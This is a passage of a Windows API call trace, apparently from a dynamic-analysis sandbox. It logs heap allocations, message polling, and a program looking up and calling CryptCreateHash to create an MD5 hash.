lpMsg=0x8cf3b8) returned 0 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.633] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0263.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.634] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.635] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e20 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.635] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51be0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.639] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0263.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.639] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0263.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0263.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0263.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.643] PeekMessageW (in: 